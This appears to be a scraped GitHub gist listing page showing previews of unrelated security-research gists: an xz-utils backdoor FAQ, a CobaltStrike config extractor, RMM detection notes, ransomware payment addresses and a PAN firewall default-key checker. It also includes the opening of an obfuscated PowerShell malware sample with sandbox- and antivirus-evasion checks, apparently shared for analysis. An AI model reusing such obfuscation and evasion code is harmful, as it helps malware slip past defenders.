Skip to content

Instantly share code, notes, and snippets.

View danzek's full-sized avatar
🎵
Listening to meowzek

Dan danzek

🎵
Listening to meowzek
View GitHub Profile
[
"928350122843193385",
"1185047194261274665",
"956202276408688650",
"956104664821157918",
"1185047092478095443",
"1185046791826178099",
"1185047045413797898",
"928483283698851901",
"1185047444619284641",
#!/usr/bin/env python3
import ctypes
import time
import threading
def test():
def access(path):
f = open(path, 'rb')
__ = f.read(8192)
There appears to be a string encoded in the binary payload:
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01#file-hashes-txt-L115
Which functions as a killswitch:
https://piaille.fr/@zeno/112185928685603910
Thus, one workaround for affected systems might be to add this to `/etc/environment`:
```
@thesamesam
thesamesam / xz-backdoor.md
Last active May 19, 2024 20:15
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that

@heck-gd
heck-gd / cs_volatility_config.py
Created October 13, 2023 11:51
CobaltStrike Volatility Config Extractor
from __future__ import annotations
import re
from itertools import cycle
MAX_SETTINGS = 128
def load_mapping(filename: str) -> dict[int, int]:
"""Processes textual Volatility memmap output into a page mapping."""
@brokensound77
brokensound77 / RMM-detection.md
Last active March 23, 2024 18:04
Detection Engineering: RMM analysis

Detecting RMM

The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.

  • if the software is not used in the envrionment
    • could it be legitimate by a random empoyee?
    • is it an attacker BYOL
    • even so, all occurrences could probably be considered suspicious
  • if it is used in the environment
    • is every use of it legitimate? Probably not
  • this also creates significant living off the land (LOL) opportunity
@cablej
cablej / ESXi ransomware payment addresses
Last active February 26, 2023 22:32
A list of ESXi ransomware payment addresses from https://ransomwhe.re/, collected from Censys and Shodan.
15m7FP7U4kDJhAVtjjUdUB8WYswpf7Dtho
1Nm2TMEFEdyb2BP6tLyuREoKECztibuK6P
1LJYrTxrQA5pFRRg2bSyJLT6MGezmMBVfX
1EiCssanXmavzjtffYHzK6aVeQHngUxX1s
1H65AnxCg7mT4rTZmRzH8cxENk1N12rhkZ
1CVbdRQQ3TeWaPWqARKP9wvAEPvavJDrKo
1B9APV4ARm26MUW74ZcGNQE9hBHM5XGPbg
14u8xH6KdJFoTP93Lep9tpb1KQQvshQaAj
145V8AXLZpFv1ABVEsMYFsGpaZPwgKNZbf
1LGBP4iwrwv3GxybQ5QZJ19M3MAP76cw6U
@LeeHolmes
LeeHolmes / Get-TwitterThread.ps1
Created November 15, 2022 17:57
Recover your Twitter threads from your Twitter export data
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json
$currentThread = ""
foreach($currentTweetJson in $tweets)
{
$currentTweet = $currentTweetJson.tweet
if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
{
This file has been truncated, but you can view the full file.
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
@rqu1
rqu1 / checkmk.py
Last active November 13, 2023 22:07
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():